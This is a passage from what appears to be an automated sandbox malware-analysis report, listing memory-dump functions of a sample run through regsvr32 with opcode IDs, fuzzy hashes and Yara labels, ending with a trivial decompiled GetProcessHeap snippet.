                                                                                                    • Instruction Fuzzy Hash: 5D51F3B090034A8FDB18CF24D88A4DE7FA1FB58358F11461DE89AA6290D3B8D665CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260BC6C Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: a[
                                                                                                    • API String ID: 0-3246833765
                                                                                                    • Opcode ID: c3466e78bab43c9f561cfc65ffc30d9b884b543cee62c2e6b7bce59c16989822
                                                                                                    • Instruction ID: 1a7fc7b08ac314d289ae1259488b6a909e7c80340e14fe9b796fd49209c5a46d
                                                                                                    • Opcode Fuzzy Hash: c3466e78bab43c9f561cfc65ffc30d9b884b543cee62c2e6b7bce59c16989822
                                                                                                    • Instruction Fuzzy Hash: 3F41027150468CDBDB6CDF68C8CA49E3BA0FF44398FA05229FD06872A4D7B5D885CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026119CC Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2615204595
                                                                                                    • Opcode ID: 6b1a7f3e487d2cf3acaf28a620e9dcdc599b515142fb432d773049f3f4357734
                                                                                                    • Instruction ID: fd68d745d3f77d8b67485ab8864e0c2940f5126c30fbcda5035f5b799835f4f6
                                                                                                    • Opcode Fuzzy Hash: 6b1a7f3e487d2cf3acaf28a620e9dcdc599b515142fb432d773049f3f4357734
                                                                                                    • Instruction Fuzzy Hash: D8412B70548388CBEBB9CF78C8896D977B1FB44304F940529D90D8E290DB749689CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026063C0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M+c
                                                                                                    • API String ID: 0-4057387630
                                                                                                    • Opcode ID: e8ddf536b9ca0a63a489b97ea909922e58a2a280582a348e9c701b61ac5619d4
                                                                                                    • Instruction ID: 9f23640f31090618b61c9c6f7c3b38894e241dd2be02e3f9443db2fc06b9f0da
                                                                                                    • Opcode Fuzzy Hash: e8ddf536b9ca0a63a489b97ea909922e58a2a280582a348e9c701b61ac5619d4
                                                                                                    • Instruction Fuzzy Hash: 8841B2B090434E8BDF48DF64C88A5DE7FB1FB68398F11421DEC4A96250D3B896A5CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026280A8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 1K
                                                                                                    • API String ID: 0-1720356181
                                                                                                    • Opcode ID: 7060ac240d5983f224a658e7da914f87139d0f937c89ba26a45135192a9ae625
                                                                                                    • Instruction ID: 23fd22d984954eb845fc720c4d08ecec5027cb2df0ac1fa008afa27d6f2a3e28
                                                                                                    • Opcode Fuzzy Hash: 7060ac240d5983f224a658e7da914f87139d0f937c89ba26a45135192a9ae625
                                                                                                    • Instruction Fuzzy Hash: 774190B091074A8FDB48CF68C4864DE7FF0FB68398F214619F859A6290D37896A4CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02614498 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: cYc
                                                                                                    • API String ID: 0-1459733467
                                                                                                    • Opcode ID: 1d487b31d29204f5f515e7eeb61de905c6f0fc698fb3fd48774ffc18ad194f9e
                                                                                                    • Instruction ID: d88a101adcb9a833b38de6cbcc5d4a4c157e4be7856f0b3d5443f81f09f07a0c
                                                                                                    • Opcode Fuzzy Hash: 1d487b31d29204f5f515e7eeb61de905c6f0fc698fb3fd48774ffc18ad194f9e
                                                                                                    • Instruction Fuzzy Hash: B941B4B151078E8FDF48CF64C88A5DE7BB0FB18358F110A19EC6A96290D3B8D664CF85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02609198 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #X
                                                                                                    • API String ID: 0-1684620495
                                                                                                    • Opcode ID: c9d417f870592ac4ebdad90e6deeba3775bc2261d848edc95af49dc984ee2113
                                                                                                    • Instruction ID: cda28c5345c540387c900fdcf161b7169a6e071be835bbbd134a9138cb844408
                                                                                                    • Opcode Fuzzy Hash: c9d417f870592ac4ebdad90e6deeba3775bc2261d848edc95af49dc984ee2113
                                                                                                    • Instruction Fuzzy Hash: 2041C2B090074E8FDB48CF68D4874DE7FB0FB68398F204619EC5AA6250D3B496A5CBD5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261BD30 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ng
                                                                                                    • API String ID: 0-1769054253
                                                                                                    • Opcode ID: 78505ce29b527744530aac0f684dd8c439c0128401af1c6e98b65c54c19613f8
                                                                                                    • Instruction ID: bfeca5e3d671563b62ecdd79fa59c39ab6498d0ff7a49e65058022c26d8b463a
                                                                                                    • Opcode Fuzzy Hash: 78505ce29b527744530aac0f684dd8c439c0128401af1c6e98b65c54c19613f8
                                                                                                    • Instruction Fuzzy Hash: 1131F2705187848FD748DF68C08991AFFF1EB99388F64095DE585CB274C3B5E985CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261ACCC Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: F(
                                                                                                    • API String ID: 0-3528413830
                                                                                                    • Opcode ID: 916bcc85fcbe8bd8542b71247c9dd38a528587568885dac2c979e5fd14e4a9c4
                                                                                                    • Instruction ID: 17e58e51a84af10fc6953d9920d931bf6f27110d94f708711ce654e4c9b35d4a
                                                                                                    • Opcode Fuzzy Hash: 916bcc85fcbe8bd8542b71247c9dd38a528587568885dac2c979e5fd14e4a9c4
                                                                                                    • Instruction Fuzzy Hash: CC317C716183858BC348DF28C49651ABBE1FBCD30CF405B2DF4CAAA290D378D605CB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260CDD0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Ak
                                                                                                    • API String ID: 0-1927009387
                                                                                                    • Opcode ID: 0abb2458921caff62e89d013e38b4fb590f7a7d72745cb2e361b02f9d7b3ca05
                                                                                                    • Instruction ID: 45cb013f204e050bc3012cbfc39dd36ceddc0c366bfdd104dd90a87226b8c894
                                                                                                    • Opcode Fuzzy Hash: 0abb2458921caff62e89d013e38b4fb590f7a7d72745cb2e361b02f9d7b3ca05
                                                                                                    • Instruction Fuzzy Hash: 0F41C4B090038ACFDB44CF64C88A5DE7FB0FB58358F111A19F86996260D3B8D665CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02618970 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Aj
                                                                                                    • API String ID: 0-98362621
                                                                                                    • Opcode ID: 137533efc20367e4244394909d38161a6e119aebfc56614c583220858821ac16
                                                                                                    • Instruction ID: 038d37f8bf500a3d9af737a9a80fb6b1d304dd7093034e68e8889f9094c2046b
                                                                                                    • Opcode Fuzzy Hash: 137533efc20367e4244394909d38161a6e119aebfc56614c583220858821ac16
                                                                                                    • Instruction Fuzzy Hash: 3D4192B190034E8FDB88DF64C98A4DE7FB0FB68398F100619E85696250D7B896A4CFD5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261FE14 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 9B
                                                                                                    • API String ID: 0-3616522233
                                                                                                    • Opcode ID: d8d4a82afe8cfbd140b5399b4039555757467a013fa9ec5880698b859e34c42f
                                                                                                    • Instruction ID: f1b9b680177fc763ff29c19eff6631b2b4c5a9eebc8c37f81d972252dc80b27a
                                                                                                    • Opcode Fuzzy Hash: d8d4a82afe8cfbd140b5399b4039555757467a013fa9ec5880698b859e34c42f
                                                                                                    • Instruction Fuzzy Hash: DD3192B1628381ABD3C8CF28C09591EBBF1FBC5304F806A2DF9C696261D7B4D4468B46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026231AC Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \?
                                                                                                    • API String ID: 0-3786485146
                                                                                                    • Opcode ID: 871947e052e6f569719495b25f0dfea8a72311c3e2111cbd05ce5ffee4c4734e
                                                                                                    • Instruction ID: f6a8c7b0738b38d3af9100af446ca9d4abb29cc50262e173c049336d6b10ff39
                                                                                                    • Opcode Fuzzy Hash: 871947e052e6f569719495b25f0dfea8a72311c3e2111cbd05ce5ffee4c4734e
                                                                                                    • Instruction Fuzzy Hash: 7E3164B150078E8FDF48DF68D85A49E3BA5FB18308F014A19FC2A9A350D7B4E665CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261BB00 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7p
                                                                                                    • API String ID: 0-2178663415
                                                                                                    • Opcode ID: ad440f66e1c167a5b00d8d986425a444af3d5c7bbedf11aabc13990a54842dc5
                                                                                                    • Instruction ID: c0922b3905db9ce1da9f6f13361a72da3365d0ec829843d2faf7615a89338304
                                                                                                    • Opcode Fuzzy Hash: ad440f66e1c167a5b00d8d986425a444af3d5c7bbedf11aabc13990a54842dc5
                                                                                                    • Instruction Fuzzy Hash: EF318C75529381AFD788DF28C08A91ABBE0FB89348F806E2DF9C687291D775D445CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260C3DC Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: b
                                                                                                    • API String ID: 0-3294104143
                                                                                                    • Opcode ID: 684d5c2f29ddeceaac4ef48e235c80282e17115a7d7dd23180ec7e11496c9bce
                                                                                                    • Instruction ID: 75f9a894462dfb6795884d443de8ed9a22907b4d65fff6577f1eb7cb8087fa04
                                                                                                    • Opcode Fuzzy Hash: 684d5c2f29ddeceaac4ef48e235c80282e17115a7d7dd23180ec7e11496c9bce
                                                                                                    • Instruction Fuzzy Hash: 14317BB15187848BD348DF28C44A51EBBE1FB8D30CF504B2DF4CAAA265D778D606CB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026018A4 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: MG
                                                                                                    • API String ID: 0-3971413892
                                                                                                    • Opcode ID: f9c35741d4925eae063dfea9b6fd049814eac02b62db703937855c2a2eeb4a2c
                                                                                                    • Instruction ID: 11b7596e95894b0f8839e2fa200d32286f5a266aa41d98aa379639b0eda24374
                                                                                                    • Opcode Fuzzy Hash: f9c35741d4925eae063dfea9b6fd049814eac02b62db703937855c2a2eeb4a2c
                                                                                                    • Instruction Fuzzy Hash: A23182B5629781AFD388DF28D49992ABBE1FBC9304F80AA1DF88687350D774D4058B06
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02611244 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: </
                                                                                                    • API String ID: 0-2583385689
                                                                                                    • Opcode ID: 1b60aeae55b41eec613f29ad86877faf5a06a1b767247c1a69a59bdaeb201ecb
                                                                                                    • Instruction ID: 237bb6601933e313d2e886ccc59250f2c6fb5da48220a6ebde9a66759e8fa41c
                                                                                                    • Opcode Fuzzy Hash: 1b60aeae55b41eec613f29ad86877faf5a06a1b767247c1a69a59bdaeb201ecb
                                                                                                    • Instruction Fuzzy Hash: A131A17050478A8BDB48DF64C88A0DF7BB0FB54358F104A19E86A96290D7B89665CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02617A28 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3
                                                                                                    • API String ID: 0-2413921980
                                                                                                    • Opcode ID: be37feb159adf3d2c102e6210a2a07fb2acfffa295be62db6e697d08d09b73d7
                                                                                                    • Instruction ID: 935246bdc4fc6fbd861274edb6daa80022d698a0e3146a571f653c9742b012fa
                                                                                                    • Opcode Fuzzy Hash: be37feb159adf3d2c102e6210a2a07fb2acfffa295be62db6e697d08d09b73d7
                                                                                                    • Instruction Fuzzy Hash: 393192B491038A8FDB98CF68D9454EE7BB0FB08714F010A19EC2996291D7B89665CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260B79C Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HA
                                                                                                    • API String ID: 0-2023925492
                                                                                                    • Opcode ID: 1cbbc6e1e80aae3212b2959876a9fdb48e773b69325d1f5eaa2e7bc9c1e6e0da
                                                                                                    • Instruction ID: 1257414b41106364b8a76984a95aa1c72aaae7906e9f801075a094ad45e0297d
                                                                                                    • Opcode Fuzzy Hash: 1cbbc6e1e80aae3212b2959876a9fdb48e773b69325d1f5eaa2e7bc9c1e6e0da
                                                                                                    • Instruction Fuzzy Hash: D23170B1528381ABD388DF28D59991ABBE1BBD5308F816A1DF9858B390D774D444CF42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261B9E8 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Gk
                                                                                                    • API String ID: 0-612463597
                                                                                                    • Opcode ID: bbbef95587748e87816d8e4005c37cee60156e63a26054a0115dbd908b0347e4
                                                                                                    • Instruction ID: 729af3bd797662bc2a0cea59ec67186a933556c541ff47ca200d271974993a9b
                                                                                                    • Opcode Fuzzy Hash: bbbef95587748e87816d8e4005c37cee60156e63a26054a0115dbd908b0347e4
                                                                                                    • Instruction Fuzzy Hash: 77317AB55183818BD388DF28C45A41ABBE4FBCD30CF405B2DF5CAA6291D779D6068B4B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02617788 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3}
                                                                                                    • API String ID: 0-2600893006
                                                                                                    • Opcode ID: b8c7a4eac8153399cd093a6b0d7460b5e4276d1e951f56e11648a8e966845251
                                                                                                    • Instruction ID: 540adf5b181b93bcb04c25a915060226c0878019a43f0a2159c4435d0ef80f6b
                                                                                                    • Opcode Fuzzy Hash: b8c7a4eac8153399cd093a6b0d7460b5e4276d1e951f56e11648a8e966845251
                                                                                                    • Instruction Fuzzy Hash: B7315DB06087818BD748DF28D55951ABBE1BB9C318F404B2DF4CAAA390D37CD645CB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02601480 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: j
                                                                                                    • API String ID: 0-2639687660
                                                                                                    • Opcode ID: 05b2ad908c1b26f88a1c37b04bf003dc3ae27f20c192771c1aaf45d2c652fcda
                                                                                                    • Instruction ID: bf96273c560c1b47a9594fd2af1f0d4fdb2756555f6bc22878bcd6836db64dd8
                                                                                                    • Opcode Fuzzy Hash: 05b2ad908c1b26f88a1c37b04bf003dc3ae27f20c192771c1aaf45d2c652fcda
                                                                                                    • Instruction Fuzzy Hash: CB3168B19087808FD388DF28D44941BBBE0BB8C358F404B2DF4CAA6265D778DA45CF4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02604B58 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: kQ
                                                                                                    • API String ID: 0-3686580721
                                                                                                    • Opcode ID: 8650c2ab5f3efb0fbf004e26a4f8fa9550883d6d30caf290e9b9421a863ccf1d
                                                                                                    • Instruction ID: 47ee6186c98ac0ad8f916d84f422e1ec04a76fc91a786dafec92127c366cbfe0
                                                                                                    • Opcode Fuzzy Hash: 8650c2ab5f3efb0fbf004e26a4f8fa9550883d6d30caf290e9b9421a863ccf1d
                                                                                                    • Instruction Fuzzy Hash: EE2168B46087859FD348DF29D44941BBBE1FB88308F804B2DF4CAAA260D378D6558F4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02616F80 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x#Q9
                                                                                                    • API String ID: 0-1231113163
                                                                                                    • Opcode ID: 8dd814b7dddc7d6ca28401fed2fd6b0c0f2a13761188edf8924b50f966e89400
                                                                                                    • Instruction ID: 93c499f0ba37c77e638fd35290591d643a101b79bb1c2cdc85b5bda5b1fa388b
                                                                                                    • Opcode Fuzzy Hash: 8dd814b7dddc7d6ca28401fed2fd6b0c0f2a13761188edf8924b50f966e89400
                                                                                                    • Instruction Fuzzy Hash: E52147B06087818FD798DF28D48941EBBE0BB9C358F404B5DF4CAA7260D7789654CB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02611D40 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: EE
                                                                                                    • API String ID: 0-3395361952
                                                                                                    • Opcode ID: 4d1736ad74c88e9a2c496f57ae58427e186eb7252ce607e733189fe674d59c41
                                                                                                    • Instruction ID: aa666d2c19437857edc107e269b2a37c18080235d38eb10aab9f37b1e4ba989b
                                                                                                    • Opcode Fuzzy Hash: 4d1736ad74c88e9a2c496f57ae58427e186eb7252ce607e733189fe674d59c41
                                                                                                    • Instruction Fuzzy Hash: FD11B770519784ABD78CDF28C59A91EBFE1BBD4708F80692CF4869B390D774D845CB06
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02613DE0 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: !
                                                                                                    • API String ID: 0-3089005804
                                                                                                    • Opcode ID: a75bc96e764e681407f904e34daf35681864a2fd8352bf17a6af412ab38a64ec
                                                                                                    • Instruction ID: e1f543db8d73a0db265d7d54ad1331f7605f6a88c61413d557a981f11e1b18f7
                                                                                                    • Opcode Fuzzy Hash: a75bc96e764e681407f904e34daf35681864a2fd8352bf17a6af412ab38a64ec
                                                                                                    • Instruction Fuzzy Hash: 222148B45087858BD788DF28D09950ABBE0FB9C358F804B1DF4CEA6254D7B89645CF4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800315BC Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E000000011800315BC(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x8005ea80 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                    0x1800315c0
                                                                                                    0x1800315c9
                                                                                                    0x1800315d7

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
